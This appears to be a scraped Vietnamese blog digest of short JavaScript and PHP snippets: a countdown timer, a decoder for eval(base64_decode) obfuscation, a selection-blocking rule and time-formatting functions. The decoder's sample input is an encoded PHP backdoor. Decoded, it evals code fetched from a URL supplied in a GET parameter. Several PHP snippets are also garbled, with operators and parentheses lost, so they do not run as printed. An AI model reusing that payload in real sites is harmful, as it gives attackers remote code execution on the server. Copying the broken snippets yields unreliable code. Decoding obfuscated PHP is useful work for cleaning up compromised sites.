Tuesday, June 9, 2015

Javascript Bộ đếm Ngược Ngày Giờ Phút Giây

Javascript Bộ đếm Ngược Ngày Giờ Phút Giây


Javascript Bộ đếm Ngược Ngày Giờ Phút Giây

Posted: 09 Jun 2015 07:47 AM PDT




Code:

<script type="text/javascript">
function DaysHMSCounter(initDate, id){
    this.counterDate = new Date(initDate);
    this.container = document.getElementById(id);
    this.update();
}
 
DaysHMSCounter.prototype.calculateUnit=function(secDiff, unitSeconds){
    var tmp = Math.abs((tmp = secDiff/unitSeconds)) < 1? 0 : tmp;
    return Math.abs(tmp < 0 ? Math.ceil(tmp) : Math.floor(tmp));
}
 
DaysHMSCounter.prototype.calculate=function(){
    var secDiff = Math.abs(Math.round(((new Date()) - this.counterDate)/1000));
    this.days = this.calculateUnit(secDiff,86400);
    this.hours = this.calculateUnit((secDiff-(this.days*86400)),3600);
    this.mins = this.calculateUnit((secDiff-(this.days*86400)-(this.hours*3600)),60);
    this.secs = this.calculateUnit((secDiff-(this.days*86400)-(this.hours*3600)-(this.mins*60)),1);
}
 
DaysHMSCounter.prototype.update=function(){
    this.calculate();
    this.container.innerHTML =
        " " + this.days + " " + (this.days == 1? "day" : "days") +
        " " + this.hours + " " + (this.hours == 1? "hour" : "hours") +
        " " + this.mins + " " + (this.mins == 1? "min" : "mins") +
        " " + this.secs + " " + (this.secs == 1? "sec" : "secs");
    var self = this;
    setTimeout(function(){self.update();}, (1000));
}
 
window.onload=function(){ new DaysHMSCounter('January 01, 2013 00:00:00', 'counter'); }
 
</script>










----------
Nguồn www.yeuquangngai.net

Code đơn Giản Giải Mã Kiểu Mã Hóa Eval(base64_decode)

Posted: 09 Jun 2015 07:44 AM PDT




Mã PHP:

<?php

$string 
"eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpYUW9KRjlIUlZSYkltTjFiMjVuYTJWdVp5SmRLU2tLZXdvSlpXTm9ieUFpU0dWc2JHOGdRM1Z2Ym1kTFpXNW5JRG9nUEM5aWNqNGdJanNLQ1dsbUtHbHpjMlYwS0NSZlIwVlVXeUpyZFhKc0lsMHBLUW9KQ1hzS0NRa0phV1lvSkY5SFJWUmJJbXQxY213aVhTRTlJaUlwQ2drSkNXVjJZV3dvWm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1vSkY5SFJWUmJJbXQxY213aVhTa3BPd29KQ1gwS0NRbGxiSE5sQ2drSlpXTm9ieUFpUEdFZ2FISmxaajFjSWo5amRXOXVaMnRsYm1jbWEzVnliRDFjSWo1dVpYaDBQQzloUGlJN0NnbGxlR2wwS0NrN0NuMD0iKSk7'));";

while( 
preg_match"/base64\_decode/"$string ) ){ $string preg_replace"/eval\(base64\_decode\(['\"](.*?)['\"]\)\)\;/i""\\1"$string ); $string base64_decode$string );}

echo 
$string;

?>










----------
Nguồn www.yeuquangngai.net

Không Cho Bôi đen Nội Dung Html

Posted: 09 Jun 2015 07:43 AM PDT




Code:

$('#imglist').attr('unselectable','on').css({
 '-moz-user-select':'-moz-none',
 '-moz-user-select':'none',
 '-o-user-select':'none',
 '-khtml-user-select':'none',
 '-webkit-user-select':'none',
 '-ms-user-select':'none',
 'user-select':'none'
}).bind('selectstart', function(){ return false; });










----------
Nguồn www.yeuquangngai.net

Code Php Xuất Giờ Phút Giây Từ Số Giây

Posted: 09 Jun 2015 07:39 AM PDT




Mã PHP:

function nv_number2time$number )
{
         global 
$lang_global;
 
         
$h 0;
        
$m 0;
        
$s 0;
 
        
$tmp $number 3600;
        
$h = ( $number $tmp ) / 3600;
 
        
$tmp = ( $number $h 3600 ) % 60;
        
$m = ( $number $h 3600 $tmp ) / 60;
 
        
$s $number - ( $h 3600 $m 60 );
 
        if( 
$h 10 $h '0' $h;
        if( 
$m 10 $m '0' $m;
        if( 
$s 10 $s '0' $s;
 
        return 
$h ' ' $lang_global['hour'] . ' ' $m ' ' $lang_global['min'] . ' ' $s ' ' $lang_global['sec'];











----------
Nguồn www.yeuquangngai.net

Tạo đồng Hồ đếm Giờ Phút Giây Tăng Dần

Posted: 09 Jun 2015 07:38 AM PDT




Code:

var totalTime = 0;
var timer;
function nvTimer(){
totalTime ++;
 
var tmp;
 
h = 0;
m = 0;
s = 0;
 
tmp = totalTime % 3600;
h = ( totalTime - tmp ) / 3600;
 
tmp = ( totalTime - h * 3600 ) % 60;
m = ( totalTime - h * 3600 - tmp ) / 60;
 
s = totalTime - ( h * 3600 + m * 60 );
 
if( h < 10 ) h = '0' + h;
if( m < 10 ) m = '0' + m;
if( s < 10 ) s = '0' + s;
 
$('#timer').html( h + ' {GLANG.hour} ' + m + ' {GLANG.min} ' + s + ' {GLANG.sec}' );
}










----------
Nguồn www.yeuquangngai.net